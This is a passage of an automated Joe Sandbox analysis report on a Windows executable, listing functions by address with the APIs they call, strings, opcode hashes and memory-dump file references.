                                                                                                                                                                                                                                                                    • Instruction ID: 2a8e6345c1da827573bafa61699fe2058e0613da09c450c42f65518c3299f71e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1f02e58a53d84fc7e1140356b729e7ad3c4ef579053cb0ed929bf1a68765758
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3431C1B1A40215AFE700DF5ADC85F5A7BA8EB04724F14417FF904A7391EF74AA008BA9
                                                                                                                                                                                                                                                                    Function 00414530 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004145A9
                                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0041461B
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0041463D
                                                                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00414660
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$LockitLockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2694047013-0
                                                                                                                                                                                                                                                                    • Opcode ID: 6201b34415790ecdc3c4312f4d7271bec7e3576b96991d2cb71848aa7408f576
                                                                                                                                                                                                                                                                    • Instruction ID: cab6b8252c7ea6f46c49d82a6c8e4df40f83147f90a4d45c9da3e1dc65de2ae0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6201b34415790ecdc3c4312f4d7271bec7e3576b96991d2cb71848aa7408f576
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A41DD728001499FCB10DF59C880AAEB7B5FB94324F24426ED905633A0EB38AD41CB9A
                                                                                                                                                                                                                                                                    Function 00404306 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 72COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 0041FA30: WaitForSingleObject.KERNEL32(00000008,000000FF,00000000,00000008,00405984,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB10
                                                                                                                                                                                                                                                                      • Part of subcall function 0041FA30: CloseHandle.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB19
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004044EC
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandle$ObjectSingleWait
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in DestroyEvent $OOBEEvents$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 2079671238-3942007460
                                                                                                                                                                                                                                                                    • Opcode ID: 4e7abf2cf1a66fdbb446cba8b09f4a72dc1d6461a6f6d23e6cde9c9ed48dca8b
                                                                                                                                                                                                                                                                    • Instruction ID: aac3e4b64ef8bd33976eafc0c19c8d66d4ba662bde6bb840a130360140da2fc7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e7abf2cf1a66fdbb446cba8b09f4a72dc1d6461a6f6d23e6cde9c9ed48dca8b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87212670B843109BCB20DF148C4675A3B58AF51B11F1404BFE9466B2C1DEBCA905C7AE
                                                                                                                                                                                                                                                                    Function 00404050 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(00000000,00000000,00000008,?,?,004059AA), ref: 0040405B
                                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(00497733,?,?,004059AA), ref: 00404065
                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 004040F5
                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32(?,?,004059AA,?,?,?,?,?,?,?,?,?,?,?,?,00000028), ref: 00404103
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalDeleteSection$InitializeUninitialize
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 161803370-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1374b990ee36924d85f733176f9cff0057eba2b114e7e0308ad5df1b95475ba0
                                                                                                                                                                                                                                                                    • Instruction ID: 8dbd2ad74c855c1e3886fba8a0bf51dabcff8673f71024995de98868baa7c6da
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1374b990ee36924d85f733176f9cff0057eba2b114e7e0308ad5df1b95475ba0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF11B2B16001416BD704EBA6DC49B59B7A8FF90319F10013AF309C7A90DBB9F964C7AA
                                                                                                                                                                                                                                                                    Function 0041FE90 Relevance: 5.4, APIs: 4, Instructions: 417COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?), ref: 0041FF5B
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 0041FF65
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8d4374fadd7b43dced5683e9704e2794f3d6c2d318b486cb43d93fc2591642e0
                                                                                                                                                                                                                                                                    • Instruction ID: bd9ddbb0fe4a3e6c369a6c316b03fe687d8d5a0e13e3211eb2381caa863402dd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d4374fadd7b43dced5683e9704e2794f3d6c2d318b486cb43d93fc2591642e0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BAF19B72A00218AFCF00DF98D880AAEBBF5FF48310F54456AF945A7352D735AD45CBA9
                                                                                                                                                                                                                                                                    Function 0046A7CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00402170: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,0040320B,?,?,?,?,\\.\pipe\,00000009,?,?), ref: 00402175
                                                                                                                                                                                                                                                                      • Part of subcall function 00402170: GetLastError.KERNEL32(?,00000000,00000000,?,0040320B,?,?,?,?,\\.\pipe\,00000009,?,?), ref: 0040217F
                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0040120A), ref: 0046A7FE
                                                                                                                                                                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040120A), ref: 0046A80D
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0046A808
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                    • API String ID: 3511171328-631824599
                                                                                                                                                                                                                                                                    • Opcode ID: 00762af9e337a6805c8ac2cb9da72729d3ba67172526ae018d23e5fce0be16ff
                                                                                                                                                                                                                                                                    • Instruction ID: 855bd9d759665368c18885314bfe8a93a87ca15081f3247de167772f86f515d8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00762af9e337a6805c8ac2cb9da72729d3ba67172526ae018d23e5fce0be16ff
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24E06D742007118BD3B0AF65E408B46BAE4AB15704F00887FE481E3681EBB8E8448FAA

                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                    Function 027192CC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129memoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 02719314
                                                                                                                                                                                                                                                                      • Part of subcall function 02719098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 027190C1
                                                                                                                                                                                                                                                                      • Part of subcall function 02719098: VirtualFree.KERNELBASE(00000000,00000000,?), ref: 0271926D
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 02719366
                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 027193C0
                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,?), ref: 027193F3
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000003.2765700918.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_3_26e0000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Virtual$Alloc$Free$Protect
                                                                                                                                                                                                                                                                    • String ID: ,
                                                                                                                                                                                                                                                                    • API String ID: 1004437363-3772416878
                                                                                                                                                                                                                                                                    • Opcode ID: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                                                                                                                                    • Instruction ID: 14360ff7d2d6f0800cd8e5263ca5f9c56b45407e6c9f98f64014de302f8ee2b6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1251FAB5900609EFDB11DFA9C885A9EBBF4FF08344F10851AEA59A7240D370E951CFA4
                                                                                                                                                                                                                                                                    Function 02710BA2 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000003.2765700918.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_3_26e0000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3509577899-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8643b7cb378e3b704611790b4db6617fbe1f52a074970517699d2cbc06b19a36
                                                                                                                                                                                                                                                                    • Instruction ID: 2fd9e63c58a186d34c142f9fda401149292cd1fa024f6228c6acb09c00afd48f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8643b7cb378e3b704611790b4db6617fbe1f52a074970517699d2cbc06b19a36
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B51C972600606AFEF225F6ACC88EBB77AEEF45718B154169FD44D6150EB31EC90CB60
                                                                                                                                                                                                                                                                    Function 02719098 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 027190C1
                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,?), ref: 0271926D
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000003.2765700918.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_3_26e0000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2087232378-0
                                                                                                                                                                                                                                                                    • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
